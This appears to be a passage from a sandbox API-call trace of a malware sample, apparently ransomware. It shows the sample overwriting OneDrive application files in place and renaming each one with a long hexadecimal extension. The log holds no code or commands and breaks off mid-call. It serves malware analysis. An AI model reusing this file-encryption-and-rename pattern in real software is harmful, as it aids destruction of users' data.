lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcr120.dll", lpString2=".DB90C0429CC02D509EACF711AA7F88D447B9617EF5234D56BABC87CF9ADE843B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcr120.dll.DB90C0429CC02D509EACF711AA7F88D447B9617EF5234D56BABC87CF9ADE843B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcr120.dll.DB90C0429CC02D509EACF711AA7F88D447B9617EF5234D56BABC87CF9ADE843B" [0113.091] GetProcessHeap () returned 0x600000 [0113.091] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x166) returned 0x315c938 [0113.091] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x315c938, Length=0x166, FileInformationClass=0xa) returned 0x0 [0113.095] CloseHandle (hObject=0x32c) returned 1 [0113.096] GetProcessHeap () returned 0x600000 [0113.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.098] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.182] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.182] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.184] WriteFile (in: hFile=0x324, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0113.187] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.192] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0113.193] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotLogo.png", lpString2=".24FF9846016E83017D20023403E69C5B808AB7D1F51F6634638C6F68C27F254E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotLogo.png.24FF9846016E83017D20023403E69C5B808AB7D1F51F6634638C6F68C27F254E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotLogo.png.24FF9846016E83017D20023403E69C5B808AB7D1F51F6634638C6F68C27F254E" [0113.193] GetProcessHeap () returned 0x600000 [0113.193] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x172) returned 0x63aad0 [0113.193] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x27fff60, FileInformation=0x63aad0, Length=0x172, FileInformationClass=0xa) returned 0x0 [0113.194] CloseHandle (hObject=0x324) returned 1 [0113.194] GetProcessHeap () returned 0x600000 [0113.194] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.195] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.197] ReadFile (in: hFile=0x330, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0113.198] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.198] WriteFile (in: hFile=0x330, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0113.199] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.199] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x27fff70) returned 0x0 [0113.200] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotOptIn.png", lpString2=".35FF73395DA740A602FAB82C45BBAD4150D0E58D6215D4B36A8D58AA691A6804" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotOptIn.png.35FF73395DA740A602FAB82C45BBAD4150D0E58D6215D4B36A8D58AA691A6804") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotOptIn.png.35FF73395DA740A602FAB82C45BBAD4150D0E58D6215D4B36A8D58AA691A6804" [0113.200] GetProcessHeap () returned 0x600000 [0113.200] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x174) returned 0x63ac58 [0113.200] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x27fff60, FileInformation=0x63ac58, Length=0x174, FileInformationClass=0xa) returned 0x0 [0113.204] CloseHandle (hObject=0x330) returned 1 [0113.205] GetProcessHeap () returned 0x600000 [0113.205] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.207] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.211] ReadFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.211] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.212] WriteFile (in: hFile=0x324, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.212] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.213] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.214] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\sqmapi.dll", lpString2=".C12AE34C48CFFBC9ACA11E4D2D63E37ACE314BE64ED3144B1C41A74CF9E9B102" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\sqmapi.dll.C12AE34C48CFFBC9ACA11E4D2D63E37ACE314BE64ED3144B1C41A74CF9E9B102") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\sqmapi.dll.C12AE34C48CFFBC9ACA11E4D2D63E37ACE314BE64ED3144B1C41A74CF9E9B102" [0113.214] GetProcessHeap () returned 0x600000 [0113.214] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x315b040 [0113.214] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x27fff60, FileInformation=0x315b040, Length=0x162, FileInformationClass=0xa) returned 0x0 [0113.215] CloseHandle (hObject=0x324) returned 1 [0113.215] GetProcessHeap () returned 0x600000 [0113.215] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.215] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.217] ReadFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.217] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.218] WriteFile (in: hFile=0x330, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.218] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.220] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.220] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SqmWrapper.dll", lpString2=".839F2F49B0BF30B513E60CF534DDD77C9983C0D7DDF2A5FC3DF9E17D2D8D6D20" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SqmWrapper.dll.839F2F49B0BF30B513E60CF534DDD77C9983C0D7DDF2A5FC3DF9E17D2D8D6D20") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SqmWrapper.dll.839F2F49B0BF30B513E60CF534DDD77C9983C0D7DDF2A5FC3DF9E17D2D8D6D20" [0113.220] GetProcessHeap () returned 0x600000 [0113.220] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x315b620 [0113.220] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x27fff60, FileInformation=0x315b620, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0113.221] CloseHandle (hObject=0x330) returned 1 [0113.222] GetProcessHeap () returned 0x600000 [0113.222] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.222] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.226] ReadFile (in: hFile=0x324, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0113.226] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.227] WriteFile (in: hFile=0x324, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0113.227] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.228] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0113.228] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SyncEngine.dll", lpString2=".5BDEEEE45333D3974AE7D0E71DF101163224C59C3FBAC815C523A5B8B169EE0A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SyncEngine.dll.5BDEEEE45333D3974AE7D0E71DF101163224C59C3FBAC815C523A5B8B169EE0A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SyncEngine.dll.5BDEEEE45333D3974AE7D0E71DF101163224C59C3FBAC815C523A5B8B169EE0A" [0113.228] GetProcessHeap () returned 0x600000 [0113.228] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x315b1b8 [0113.228] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x27fff60, FileInformation=0x315b1b8, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0113.231] CloseHandle (hObject=0x324) returned 1 [0113.232] GetProcessHeap () returned 0x600000 [0113.232] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.233] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.235] ReadFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.235] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.236] WriteFile (in: hFile=0x330, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.236] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.237] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.237] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\Telemetry.dll", lpString2=".73F34CAB942F66132E9CA08849442107C26C8356BC02236EAB335D797BC29C15" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\Telemetry.dll.73F34CAB942F66132E9CA08849442107C26C8356BC02236EAB335D797BC29C15") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\Telemetry.dll.73F34CAB942F66132E9CA08849442107C26C8356BC02236EAB335D797BC29C15" [0113.237] GetProcessHeap () returned 0x600000 [0113.237] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x168) returned 0x315b330 [0113.238] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x27fff60, FileInformation=0x315b330, Length=0x168, FileInformationClass=0xa) returned 0x0 [0113.239] CloseHandle (hObject=0x330) returned 1 [0113.240] GetProcessHeap () returned 0x600000 [0113.240] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.241] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.245] ReadFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.245] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.246] WriteFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0113.246] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.247] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.248] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\VideoStreamingPlugin.dll", lpString2=".9086F9D2B4F33D19A3B6E9859D641B1C04F94C9644D6D47592738825783F5D19" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\VideoStreamingPlugin.dll.9086F9D2B4F33D19A3B6E9859D641B1C04F94C9644D6D47592738825783F5D19") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\VideoStreamingPlugin.dll.9086F9D2B4F33D19A3B6E9859D641B1C04F94C9644D6D47592738825783F5D19" [0113.248] GetProcessHeap () returned 0x600000 [0113.248] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17e) returned 0x318b4e0 [0113.248] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x27fff60, FileInformation=0x318b4e0, Length=0x17e, FileInformationClass=0xa) returned 0x0 [0113.249] CloseHandle (hObject=0x330) returned 1 [0113.249] GetProcessHeap () returned 0x600000 [0113.249] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.250] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.254] ReadFile (in: hFile=0x324, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0113.254] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.255] WriteFile (in: hFile=0x324, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0113.256] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.262] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0113.262] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\wlmfds.dll", lpString2=".1C67ED992CDE807C08B67CC44FFFA359250713610336FB7042273E1ECD229900" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\wlmfds.dll.1C67ED992CDE807C08B67CC44FFFA359250713610336FB7042273E1ECD229900") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\wlmfds.dll.1C67ED992CDE807C08B67CC44FFFA359250713610336FB7042273E1ECD229900" [0113.262] GetProcessHeap () returned 0x600000 [0113.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x315c1e0 [0113.262] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x27fff60, FileInformation=0x315c1e0, Length=0x162, FileInformationClass=0xa) returned 0x0 [0113.263] CloseHandle (hObject=0x324) returned 1 [0113.264] GetProcessHeap () returned 0x600000 [0113.264] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.265] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.347] ReadFile (in: hFile=0x32c, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0113.347] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.348] WriteFile (in: hFile=0x32c, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0113.349] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.349] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x27fff70) returned 0x0 [0113.350] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\LoggingPlatform64.dll", lpString2=".DC85B816344D198D2F32DF94DD6BA971DBEFFB09DF28678645FD7678D4904A08" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\LoggingPlatform64.dll.DC85B816344D198D2F32DF94DD6BA971DBEFFB09DF28678645FD7678D4904A08") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\LoggingPlatform64.dll.DC85B816344D198D2F32DF94DD6BA971DBEFFB09DF28678645FD7678D4904A08" [0113.350] GetProcessHeap () returned 0x600000 [0113.350] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x184) returned 0x318ec40 [0113.350] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x318ec40, Length=0x184, FileInformationClass=0xa) returned 0x0 [0113.351] CloseHandle (hObject=0x32c) returned 1 [0113.351] GetProcessHeap () returned 0x600000 [0113.351] HeapFree (in: hHeap=0x600000, dwFlags=0x0, 